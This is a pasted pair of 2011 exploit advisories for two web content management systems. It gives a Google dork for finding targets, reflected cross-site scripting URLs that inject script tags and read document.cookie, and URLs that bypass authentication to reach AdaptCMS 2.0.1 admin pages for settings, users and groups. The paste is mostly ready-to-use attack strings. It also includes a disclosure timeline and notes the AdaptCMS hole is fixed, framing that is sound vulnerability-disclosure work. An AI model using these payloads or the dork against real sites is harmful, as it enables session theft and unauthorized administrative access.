Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Exploit Title: Snippet CMS v2.9 XSS Vulnerability
- Google Dork: "Powered by h4(k3r"
- Date: 23.09.2011
- Author: h4(k3r
- Version: 2.9
- Tested on: Unix Server
- -------------------------------------------------------------------------------------------------------
- Exploits
- http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(document.cookie)</script>
- http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(/CoBRa_21/)</script>
- -------------------------------------------------------------------------------------------------------
- Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities
- Advisory ID: SSCHADV2011-018
- Author: h4(k3r
- Affected Software: Successfully tested on AdaptCMS 2.0.1
- Vendor URL: http://h4ck3r.ze-forum.com
- Vendor Status: fixed
- CVE-ID: -
- ==========================
- Vulnerability Description:
- ==========================
- AdaptCMS 2.0.1 is prone to multiple security vulnerabilities
- ==================
- Technical Details:
- ==================
- Cross-site Scripting
- http://<target>/AdaptCMS/admin.php?view=</script><script>alert(document.cookie)</script>
- http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>
- http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>
- http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>
- Authentication bypass / Information Disclosure
- http://<target>/AdaptCMS/admin.php?view=/&view=settings
- http://<target>/AdaptCMS/admin.php?view=/&view=users
- http://<target>/AdaptCMS/admin.php?view=/&view=groups
- http://<target>/AdaptCMS/admin.php?view=/&view=levels
- http://<target>/AdaptCMS/admin.php?view=/&view=stats
- =========
- Solution:
- =========
- "Get the latest AdaptCMS Files" from the admin area
- ====================
- Disclosure Timeline:
- ====================
- 24-Sep-2011 - informed developers
- 24-Sep-2011 - Release date of this security advisory
- 25-Sep-2011 - fixed by vendor
- 25-Sep-2011 - post on BugTraq
- ========
- Credits:
- ========
- Vulnerabilities found and advisory written by Stefan Schurtz.
- ===========
- References:
- ===========
- http://h4ck3r.ze-forum.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement